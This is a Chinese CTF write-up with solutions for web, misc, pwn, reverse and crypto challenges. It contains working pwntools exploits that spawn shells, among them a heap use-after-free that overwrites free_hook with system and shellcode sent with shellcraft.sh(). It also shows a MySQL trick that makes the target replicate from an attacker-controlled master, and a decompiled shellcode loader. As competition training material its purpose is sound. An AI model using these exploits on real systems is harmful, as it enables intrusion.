文章目录
Web
sign_in
1.js create div 地方 断点找到 用户名 密码 root 64df930a434235eaa34a987c7e715bef
2.登陆进去提示http3
3.使用支持http3的curl访问得到提示FIND THE FLAG
curl 'https://172.35.14.40/api/info' -H 'authority: 172.35.14.40' -H 'accept' -H 'accept-language: zh-CN,zh;q=0.9' -H 'authorization: eyJhbGciOiJFZERTQSIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnYW1lYm94Iiwic3ViIjoid2ViLWNoYWxsZW5nZSIsImV4cCI6MTY4MDA3OTkxMywiaWF0IjoxNjgwMDc5MDEzfQ.zt1R7jpmCpuzNF67zWgl8R3vemBaxoW9X-NaZoh6lgv-_BfhIdsrVtCjxHeylWYuO_B4iitEcc4VPExlD7S0Bw' -H 'referer: https://172.35.14.40/user/home' -H 'sec-ch-ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111"' -H 'sec-ch-ua-mobile: ?0' -H 'sec-ch-ua-platform: "Windows"' -H 'sec-fetch-dest: empty' -H 'sec-fetch-mode: cors' -H 'sec-fetch-site: same-origin' -H 'user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36' --insecure -vk --http34.使用curl 下载 index.html svg js css 用>写到文件里,分别用--http3和不用,进行对比,js里有不同
5.http3访问/api/__flag__
db_trick
1.设置mysql
apt install mariadb-server
cd /etc/mysql/mariadb.conf.d
改 50-server.cnf
bind-address=0.0.0.0
log-bin=mysql-bin
server-id= 111
```
2.让这个mysql在内网可以访问,从虚拟机端口转发到本机
```bash
socat -v tcp-listen:3307,fork tcp-connect:192.168.1.2:33063.在自己的mysql执行
CREATE USER 'slave'@'%' IDENTIFIED BY 'test';
GRANT REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'slave'@'%';
flush privileges;
show master status;把master status 的pos和文件名填到参数里 master_log_file master_log_pos
4.去靶机执行,三句话分别执行一次
stop slave;
change master to master_host='172.30.14.166', master_user='slave', master_password='test', master_port=3307, master_log_file='mysql-bin.000003', master_log_pos= 956, master_connect_retry=30;
start slave;5.在自己的mysql执行
create database ctf;
create table ctf.admin(username varchar(20),password varchar(20));
insert into ctf.admin values ("test","test");6.去admin.php username=test password=test读flag
Misc
checkin Let's play mazegame
import copy
from Crypto.Util.number import *
from pwn import *
import hashlib
import base64
def proof_of_work():
rev = r.recvuntil(b"sha256(XXXX+")
suffix = r.recv(16).decode()
rev = r.recvuntil(b" == ")
tar = r.recv(64).decode()
def f(x):
hashresult = hashlib.sha256(x.encode()+suffix.encode()).hexdigest()
return hashresult == tar
prefix = util.iters.mbruteforce(
f, string.digits + string.ascii_letters, 4, 'upto')
r.recvuntil(b'XXXX: ')
r.sendline(prefix.encode())
r = remote('172.35.14.80', 11410)
proof_of_work()
data = r.recvuntil(b'[-]').decode()
dataa = data.split('\n')
dataa = dataa[6:-2]
arr = []
for i in dataa:
ii = i.split(' ')
iii = ii[3:]
arr.append(list(map(int, iii)))
brr = [[0] * 750 for i in range(0, 750)]
for i in range(0, 750):
for j in range(0, 750):
brr[i][j] = arr[i][j]
for i in range(1, 750):
for j in range(0, 750):
if j == 0:
arr[i][j] += max(arr[i - 1][j], arr[i-1][j+1])
elif j == 749:
arr[i][j] += max(arr[i-1][j], arr[i - 1][j-1])
else:
arr[i][j] += max(arr[i-1][j - 1], max(arr[i-1][j], arr[i-1][j+1]))
print(max(arr[749]))
crr = []
idx = arr[749].index(max(arr[749]))
crr.append(idx)
def has_duplicates(lst):
return len(lst) != len(set(lst))
# for i in range(0, 750):
# if has_duplicates(arr[i]):
# print("Ture", i)
for i in range(748, -1, -1):
if idx == 0:
if arr[i][idx] > arr[i][idx+1]:
idx = idx
else:
idx = idx + 1
crr.append(idx)
elif idx == 749:
if arr[i][idx] > arr[i][idx-1]:
idx = idx
else:
idx = idx - 1
crr.append(idx)
else:
if arr[i][idx] > arr[i][idx+1]:
m = idx
else:
m = idx + 1
if arr[i][m] > arr[i][idx-1]:
m = m
else:
m = idx - 1
idx = m
crr.append(idx)
# print(arr[749])
crr = crr[::-1]
# print(crr)
# print(len(crr))
sum = 0
ans = ''
for i in range(0, 750):
ans += str(crr[i])
ans += ' '
# print(arr[749][522])
ans = ans[:-1]
print(ans.encode())
r.sendline(ans)
r.interactive()shop
先输入用户名为Admin,得到提示不要吃太多1da,于是已知选1da,得到秘密任务,获取membership
于是先选30次banana来获取membership,再选1da来进入任务
手动计算每个商品的权重,然后嗯连,看运气
from pwn import *
from hashlib import md5
def getres(a):
res = [0]*14
for i in range(7):
ii = a[i+1]
sum = 0
for j in ii:
sum += j
for j in range(14):
res[j] = (res[j]*(i + 1) + ii[j]/sum)/(i + 2)
zerodata = []
for i in range(14):
if (a[0][i] == 0):
zerodata.append(i)
for j in range(14):
if (j not in zerodata):
a[0][zerodata[0]] = round(a[0][j]*res[zerodata[0]]/res[j])
a[0][zerodata[1]] = round(a[0][j]*res[zerodata[1]]/res[j])
a[0][zerodata[2]] = round(a[0][j]*res[zerodata[2]]/res[j])
a[0][zerodata[3]] = round(a[0][j]*res[zerodata[3]]/res[j])
a[0][zerodata[4]] = round(a[0][j]*res[zerodata[4]]/res[j])
a[0][zerodata[5]] = round(a[0][j]*res[zerodata[5]]/res[j])
break
return a[0]
def test3():
inputs = '3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,0,0,0,0,0,0,0,0'.split(
",")
for i in inputs:
io.sendline(i)
for _ in range(100):
io = remote("172.35.14.120", 11409)
io.sendline("admin")
test3()
io.recvuntil('Your answer is(Y/N):')
io.sendline('Y')
io.recvuntil('beginmatrix')
m = io.recvuntil('endmatirx')[3:-12].decode()
matrix = m.split('], [')
matr = []
for i in matrix:
matr.append(list(map(int, i.split(', '))))
flag = getres(matr)
s = ''
for i in flag:
s += str(i)
hash = md5(s.encode()).hexdigest()
io.recvuntil('your answer?\n')
io.sendline(hash)
data = io.recvline()
if (data != b'day: 50\n'):
print(data)
io.interactive()
break
else:
io.close()Let's play shellgame
from pwn import*
#r=process('./shellgame')
r=remote("172.35.14.100",11451)
context.log_level='debug'
context.arch="amd64"
context.os="linux"
argv=""
array=[]
#target_list="\x56\x5F\x52\x5E\x41\x53\x5A\x68\x41\x41\x41\x41\x58\x35\x61\x61\x61\x61\x50\x59\x41\x51\x58\x56\x5C\x58\x58\x58\x58\x58\x58\x51\x51\x51\x00"
target_list="^ZQ?YQX\XX_RQ5AaPASQhXAXXX0_VXaAPZ\x00"
r.recvline()
for i in range(10):
r.recvuntil(":")
num=int(r.recvuntil(" ",drop=True))
if (num<0): num=num+256
argv+=str(num)+" "
fd=os.popen("./main "+argv)
a=int(fd.readline())
b=int(fd.readline())
c=int(fd.readline())
for i in range(50): array.append(int(fd.readline()))
fd.close()
print a,b,c
def do(offset):
r.recvuntil("> ")
r.send("1\x00".ljust(0x10,"\x00")+p32(0x60))
r.recvuntil("> ")
r.sendline(str(offset))
def fix(num):
if (num<0): num=num+256
return num
for i in range(len(target_list)):
for j in range(fix(ord(target_list[i])-array[i])):
do(i+1)
array[i+1]=(array[i+1]+218)%256
array[i+2]=(array[i+2]+131)%256
r.recvuntil("> ")
r.send("1\n")
#gdb.attach(r,"b *$rebase(0x1984)")
r.recvuntil("> ")
r.sendline("0")
r.recvuntil("> ")
r.send("4\n")
r.recvline()
r.send("\x58"*0x50+asm(shellcraft.sh()))
r.interactive()Pwn
haslang
Haskell写的一个Scheme的解释器。IDA和Ghridra反编译解析都会有问题,于是采用边逆边猜边动调来做。
简单题。了解了Scheme的基本语法格式之后,结合IDA中定位到的如下命令选项:
很容易发现这是一个阉割版的Scheme,并且增加了上图中圈出的几个命令,显然这是和动态内存相关的操作。
根据Scheme的基本语法格式,随便试一下,gdb下断点到write输出报错信息,根据栈回溯找到关键汇编,并结合查看相关内存,确定命令的具体格式及语义。
(define a (alloc 32))) 指针变量a为申请的0x30大小堆块
(free a) 释放堆块a
(showChunk a) 输出堆块a的内容
(editChunk a x y) 在堆块a偏移x处单字节修改为y容易发现,这里存在一个明显的UAF漏洞,libc是低版本的2.27,剩下的就非常简单了。不过,showChunk命令只能输出小于0x80的字符,因此在泄露libc的时候,需要小爆破一手,爆破到能输出5位的时候(最后一位是0xa0不会输出)即可。
from pwn import *
context(os = 'linux', arch = 'amd64', log_level = 'debug')
#io = process("./pwn")
io = remote("172.35.14.90", 9999)
def cmd(cc) :
io.sendlineafter(">>> ", cc)
def ab_write(num, val) :
opt = "(editChunk "
for i in range(8) :
cc = opt + num + " " + str(i) + " " + str(val[i]) + ")"
cmd(cc)
cmd("(define a (alloc 1040)))")
cmd("(define b (alloc 32)))")
cmd("(define c (alloc 32)))")
cmd("(define winmt (alloc 32)))")
ab_write("winmt", b'/bin/sh\x00')
cmd("(free a)")
cmd("(showChunk a)")
libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(0x8, b'\0'))
success("libc_base:\t" + hex(libc_base))
if(len(hex(libc_base)) != 12):
exit(-1)
libc_base = (libc_base << 8) + 0xa0 - 0x3ebca0
success("libc_base:\t" + hex(libc_base))
free_hook = libc_base + 0x3ed8e8
system = libc_base + 0x4f420
cmd("(free b)")
cmd("(free c)")
ab_write("c", p64(free_hook))
cmd("(define d (alloc 32)))")
cmd("(define e (alloc 32)))")
ab_write("e", p64(system))
cmd("(free winmt)")
io.interactive()Re
我不是病毒2.0
一个被pythoninstaller打包的程序,核心代码已被编译为pyc文件。
反编译结果如下:
# Source Generated with Decompyle++
# File: sign.pyc (Python 3.10)
import hashlib as 沈阳
import base64 as 杭州
import ctypes as 蚌埠
def main():
蚌埠.windll.kernel32.VirtualAlloc.restype = 蚌埠.c_void_p
福建 = input('\xe6\x82\xa8\xe7\x9a\x84\xe8\xbe\x93\xe5\x85\xa5\xef\xbc\x9a')
天津 = '9K98jTmDKCXlg9E2kepX4nAi8H0DB57IU57ybV37xjrw2zutw+KnxkoYur3IZzi2ep5tDC6jimCJ7fDpgQ5F3fJu4wHA0LVq9FALbjXN6nMy57KrU8DEloh+Cji3ED3eEl5YWAyb8ktBoyoOkL1c9ASWUPBniHmD7RSqWcNkykt/USjhft9+aV930Jl5VjD6qcXyZTfjnY5MH3u22O9NBEXLj3Y9N5VjEgF2cFJ+Tq7jj92iIlEkNvx8Jl+eH5/hipsonKLTnoLGXs4a0tTQX/uXQOTMBbtd70x04w1Pa0fp+vA9tCw+DXvXj0xmX8c5HMybhpPrwQYDonx7xtS+vRIj/OmU7GxkHOOqYdsGmGdTjTAUEBvZtinOxuR7mZ0r9k+c9da0W93TWm5+2LKNR6OJjmILaJn0lq4foYcfD5+JITDsOD6Vg01yLRG1B4A6OxJ7Rr/DBUabSu2fYf1c4sTFvWgfMV8il6QfJiNMGkVLey1cBPSobenMo+TQC1Ql0//9M4P01sOiwuuVKLvTyDEv6dKO//muVL9S2gq/aZUBWkjj/I5rUJ6Mlt4+jsngmuke9plAjw22fUgz+8uSzn40dhKXfBX/BOCnlwWsMGAefAfoz/XAsoVSG2ioLFmlcYe/WBgaUJEoRUSyv73yiEOTVwIK6EPnDlwRgZZHx2toLu8udpEZ0aKGkex5sn7P8Jf9AbD4/EiQU+FdoJSxGorPSZGvrc4='
北京 = 沈阳.md5('\xe4\xba\x91\xe5\x8d\x97'.encode('utf-8')).hexdigest()
重庆 = 杭州.b64decode(天津)
河南 = b''
北京_len = len(北京)
广州 = list(range(256))
j = 0
for i in range(256):
j = (j + 广州[i] + ord(北京[i % 北京_len])) % 256
广州[i] = 广州[j]
广州[j] = 广州[i]
山东 = 陕西 = 0
for 河北 in 重庆:
山东 = (山东 + 1) % 256
陕西 = (陕西 + 广州[山东]) % 256
广州[山东] = 广州[陕西]
广州[陕西] = 广州[山东]
河南 += bytes([
河北 ^ 广州[(广州[山东] + 广州[陕西]) % 256]])
四川 = 蚌埠.create_string_buffer(福建.encode())
黑龙江 = 蚌埠.windll.kernel32.VirtualAlloc(蚌埠.c_int(0), 蚌埠.c_int(len(河南)), 蚌埠.c_int(12288), 蚌埠.c_int(64))
蚌埠.windll.kernel32.RtlMoveMemory(蚌埠.c_void_p(黑龙江), (蚌埠.c_ubyte * len(河南)).from_buffer(bytearray(河南)), 蚌埠.c_size_t(len(河南)))
辽宁 = 蚌埠.windll.kernel32.CreateThread(蚌埠.c_int(0), 蚌埠.c_int(0), 蚌埠.c_void_p(黑龙江), 蚌埠.byref(四川), 蚌埠.c_int(0), 蚌埠.pointer(蚌埠.c_int(0)))
蚌埠.windll.kernel32.WaitForSingleObject(蚌埠.c_int(辽宁), 蚌埠.c_int(-1))
if 四川.raw == b'\xdb\x1b\x00Dy\\C\xcc\x90_\xca.\xb0\xb7m\xab\x11\x9b^h\x90\x1bl\x19\x01\x0c\xeduP6\x0c0\x7f\xc5E-L\xb0\xfb\xba\xf6\x9f\x00':
print('\xe6\x98\xaf\xe7\x9a\x84\xef\xbc\x81\xe4\xbd\xa0\xe5\xbe\x97\xe5\x88\xb0\xe4\xba\x86\xef\xbc\x81')
return None
None('\xe4\xb8\x8d\xef\xbc\x8c\xe5\x86\x8d\xe5\xb0\x9d\xe8\xaf\x95\xe6\x9b\xb4\xe5\xa4\x9a\xe3\x80\x82 \xef\xbc\x88\xe7\xac\x91\xe8\x84\xb8\xe7\xac\xa6\xe5\x8f\xb7\xef\xbc\x89')
if __name__ == '__main__':
main()
return None通过反编译的内容可以发现程序验证flag的部分应该是一段shellcode负责,对其提取并进行分析,可发现程序每次仅处理两字节的flag,随即直接在原始shellcode的上面进行小幅度魔改,使其自动对flag进行枚举。
修改后的shellcode如下:
00000189F7D20000 | 48:BE 0000D3F789010000 | mov rsi,189F7D30000 | 正确的FLAG
00000189F7D2000A | 48:BF 0000D5F789010000 | mov rdi,189F7D50000 | 已加密的FLAG
00000189F7D20014 | 55 | push rbp |
00000189F7D20015 | 48:89E5 | mov rbp,rsp |
00000189F7D20018 | 48:83EC 20 | sub rsp,20 |
00000189F7D2001C | 48:894D 10 | mov qword ptr ss:[rbp+10],rcx | [rbp+10]:"8}}"
00000189F7D20020 | C745 FC 00000000 | mov dword ptr ss:[rbp-4],0 |
00000189F7D20027 | E9 B6000000 | jmp 189F7D200E2 |
00000189F7D2002C | 8B45 FC | mov eax,dword ptr ss:[rbp-4] |
00000189F7D2002F | 48:98 | cdqe |
00000189F7D20031 | 48:8D1400 | lea rdx,qword ptr ds:[rax+rax] |
00000189F7D20035 | 48:8B45 10 | mov rax,qword ptr ss:[rbp+10] | [rbp+10]:"8}}"
00000189F7D20039 | 48:01D0 | add rax,rdx | rax:"8}}"
00000189F7D2003C | 0FB700 | movzx eax,word ptr ds:[rax] | rax:"8}}"
00000189F7D2003F | 0FB7C0 | movzx eax,ax |
00000189F7D20042 | 8945 F8 | mov dword ptr ss:[rbp-8],eax |
00000189F7D20045 | C745 F4 ED070000 | mov dword ptr ss:[rbp-C],7ED |
00000189F7D2004C | C745 F0 EFD10000 | mov dword ptr ss:[rbp-10],D1EF |
00000189F7D20053 | 8B45 F8 | mov eax,dword ptr ss:[rbp-8] |
00000189F7D20056 | BA 00000000 | mov edx,0 |
00000189F7D2005B | F775 F0 | div dword ptr ss:[rbp-10] |
00000189F7D2005E | 8955 F8 | mov dword ptr ss:[rbp-8],edx |
00000189F7D20061 | C745 EC 01000000 | mov dword ptr ss:[rbp-14],1 |
00000189F7D20068 | EB 30 | jmp 189F7D2009A |
00000189F7D2006A | 8B45 F4 | mov eax,dword ptr ss:[rbp-C] |
00000189F7D2006D | 83E0 01 | and eax,1 |
00000189F7D20070 | 85C0 | test eax,eax |
00000189F7D20072 | 74 12 | je 189F7D20086 |
00000189F7D20074 | 8B45 EC | mov eax,dword ptr ss:[rbp-14] |
00000189F7D20077 | 0FAF45 F8 | imul eax,dword ptr ss:[rbp-8] |
00000189F7D2007B | BA 00000000 | mov edx,0 |
00000189F7D20080 | F775 F0 | div dword ptr ss:[rbp-10] |
00000189F7D20083 | 8955 EC | mov dword ptr ss:[rbp-14],edx |
00000189F7D20086 | 8B45 F8 | mov eax,dword ptr ss:[rbp-8] |
00000189F7D20089 | 0FAFC0 | imul eax,eax |
00000189F7D2008C | BA 00000000 | mov edx,0 |
00000189F7D20091 | F775 F0 | div dword ptr ss:[rbp-10] |
00000189F7D20094 | 8955 F8 | mov dword ptr ss:[rbp-8],edx |
00000189F7D20097 | D16D F4 | shr dword ptr ss:[rbp-C],1 |
00000189F7D2009A | 837D F4 00 | cmp dword ptr ss:[rbp-C],0 |
00000189F7D2009E | 75 CA | jne 189F7D2006A |
00000189F7D200A0 | 8B4D EC | mov ecx,dword ptr ss:[rbp-14] |
00000189F7D200A3 | 8B45 FC | mov eax,dword ptr ss:[rbp-4] |
00000189F7D200A6 | 48:98 | cdqe |
00000189F7D200A8 | 48:8D1400 | lea rdx,qword ptr ds:[rax+rax] |
00000189F7D200AC | 48:8B45 10 | mov rax,qword ptr ss:[rbp+10] | [rbp+10]:"8}}"
00000189F7D200B0 | 48:01D0 | add rax,rdx | rax:"8}}"
00000189F7D200B3 | 89CA | mov edx,ecx |
00000189F7D200B5 | 66:3B17 | cmp dx,word ptr ds:[rdi] |
00000189F7D200B8 | 74 32 | je 189F7D200EC |
00000189F7D200BA | 66:8306 01 | add word ptr ds:[rsi],1 | rsi:"8}}"
00000189F7D200BE | 48:89F1 | mov rcx,rsi | rsi:"8}}"
00000189F7D200C1 | E9 56FFFFFF | jmp 189F7D2001C |
00000189F7D200C6 | 8B4D EC | mov ecx,dword ptr ss:[rbp-14] |
00000189F7D200C9 | 8B45 FC | mov eax,dword ptr ss:[rbp-4] |
00000189F7D200CC | 48:98 | cdqe |
00000189F7D200CE | 48:8D1400 | lea rdx,qword ptr ds:[rax+rax] |
00000189F7D200D2 | 48:8B45 10 | mov rax,qword ptr ss:[rbp+10] | [rbp+10]:"8}}"
00000189F7D200D6 | 48:01D0 | add rax,rdx | rax:"8}}"
00000189F7D200D9 | 89CA | mov edx,ecx |
00000189F7D200DB | 66:8910 | mov word ptr ds:[rax],dx | rax:"8}}"
00000189F7D200DE | 8345 FC 01 | add dword ptr ss:[rbp-4],1 |
00000189F7D200E2 | 837D FC 14 | cmp dword ptr ss:[rbp-4],14 |
00000189F7D200E6 | 0F8E 40FFFFFF | jle 189F7D2002C |
00000189F7D200EC | 48:83C6 02 | add rsi,2 | rsi:"8}}"
00000189F7D200F0 | 48:83C7 02 | add rdi,2 |
00000189F7D200F4 | EB C4 | jmp 189F7D200BA |设置好RSI,RDI寄存器的值,将pyc中正确的值写入RDI寄存器指向的内存中,运行该段shellcode,最后即可在RSI寄存器指向的内存中得到正确的flag
Crypto
Three
发现Save_Data部分有`pwd=str(datetime.datetime.now())`
按格式`2022-08-27 20:16:??.??????`爆破压缩包密码,发现B.zip无结果,C.zip密码为`2022-08-27 20:16:17.930813`
从A.txt和C.txt中得到:
exp:
from Crypto.Util.number import *
A0 = 28829613228241459
flag1 = long_to_bytes(A0)
A00=200254991086689
A01=200241552690281
A02=A0-A00-A01
C02=924422050091355025836012334663090
B00=199957680670222
B01=200362172648094
X00=200058430391504
X01=200401773940794
Y02=924422050091362838179268571917871-507036073644
X02=(C02-A02*X00)//(A02+A00)
X0=X00+X01+X02
flag2=long_to_bytes(X0)
B02=Y02-C02
B0=B00+B01+B02
flag3=long_to_bytes(B0)TSA
非预期了,用一下RSA的同态性就绕过2的检测,然后就能拿flag。预期解应该是用时序二分一下(没操作过不太懂
from Crypto.Util.number import *
n = 88721539982175191631482309516283333516228427009238509448041754754209234470336262889795412242692660291003746665029568659244925172392301396304179467223400785883152192880520348546501742581366788672743261060653858397851335695023413281067023367225752328670847064167853346372405442899202693728765572613437113651023
c = 17938049422184350343450286858579170956720395619572889100127470519760703610006645640501125317562140408503214959722681051277833068821123465846615165165652499814086395090731872105477993058445967479675765300784965968720398043255749046915731053214480229743907332959223146784135021114036780605183132101399588308481
pt = 66002218616033453656817670713260124325343891412140260925655782228747450311002696482995326654884612230765365581127943397826162598146637267293622647234824540219412522357296916389671168113211786636690584317467841905341690480655305955524078715750188576829288739160720073122095035421709474168805778159060087466838
print(c*2%n)
y = 31708004508490831436093740939699938934148933785830762417054125221550108648943843170932435317284560225845490381850081512517823345083342697383744234517243032766778762942679680133347466715821403579772960061362915385616805508525741884796284106539281778651222644587507069138290562058540623997294616320991465472507
m = (y*inverse(pt,n))%n
print(long_to_bytes(m))
最新评论